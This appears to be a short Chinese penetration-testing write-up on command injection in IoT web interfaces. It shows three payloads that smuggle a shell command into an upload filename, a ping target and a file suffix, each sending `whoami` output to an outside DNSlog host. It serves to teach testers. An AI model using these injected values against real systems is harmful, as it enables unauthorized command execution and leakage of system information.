修改filename里面的内容:111.wav|ping `whoami`.v5hy64.dnslog.cn

神奇吧，为什么我会想到在filename拼接语句呢

因为平时在上传点的filename也是有概率存在rce的，所以我就试了试

2.命令执行

还是iot的站

看到ping的字眼就要注意了，这个包很明显就是在ping 192.168.5.1

这个包，把192.168.5.1改成192.168.5.1|curl `whoami`.vi50t3.dnslog.cn 看看会怎么样

3.(惊掉你眼睛的)命令执行

同样还是iot的站，跟上面是同一个站点

这是试听的原始包。

但是他的返回包是这样的

于是在wav后缀后面加上|ping `whoami`.ykjxel.dnslog.cn

神奇吧！！！！！！！！！！

内容来源：https://www.yuque.com/docs/share/cf9baab8-22ed-4ebc-8ced-57845792a93c